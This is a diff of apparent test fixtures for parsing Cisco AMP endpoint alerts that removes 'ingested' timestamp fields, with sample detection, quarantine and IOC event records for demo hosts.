"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 @@ -1304,7 +1289,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386289777Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 @@ -1377,7 +1361,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386290907Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 @@ -1450,7 +1433,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386291913Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 @@ -1523,7 +1505,6 @@ "action": "Quarantine Failure", "code": "2164260880", "id": "6880587034675643000", - "ingested": "2022-02-02T05:52:16.386292922Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "severity": 2 @@ -1600,7 +1581,6 @@ ], "code": "1090519054", "id": "6880587030380676000", - "ingested": "2022-02-02T05:52:16.386293948Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "severity": 2 @@ -1700,7 +1680,6 @@ ], "code": "1107296274", "id": "460392585524661250", - "ingested": "2022-02-02T05:52:16.386294939Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "severity": 2, @@ -1780,7 +1759,6 @@ ], "code": "553648173", "id": "6508191586038317000", - "ingested": "2022-02-02T05:52:16.386295935Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "severity": 0 @@ -1869,7 +1847,6 @@ ], "code": "1107296274", "id": "7007136035192884000", - "ingested": "2022-02-02T05:52:16.386296942Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "severity": 2, @@ -1949,7 +1926,6 @@ ], "code": "1107296278", "id": "1515350231459808800", - "ingested": "2022-02-02T05:52:16.386298067Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "severity": 3 @@ -2022,7 +1998,6 @@ ], "code": "553648173", "id": "6508191586038317000", - "ingested": "2022-02-02T05:52:16.386299055Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "severity": 0 @@ -2096,7 +2071,6 @@ "action": "Policy Update", "code": "553648130", "id": "6583671182384431000", - "ingested": "2022-02-02T05:52:16.386300048Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -2164,7 +2138,6 @@ ], "code": "2164260893", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386301039Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 @@ -2236,7 +2209,6 @@ ], "code": "553648155", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386316487Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 @@ -2310,7 +2282,6 @@ ], "code": "553648147", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386317480Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 @@ -2390,7 +2361,6 @@ ], "code": "553648147", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386318435Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "severity": 3 @@ -2571,7 +2541,6 @@ ], "code": "1107296279", "id": "15152998206589", - "ingested": "2022-02-02T05:52:16.386319394Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 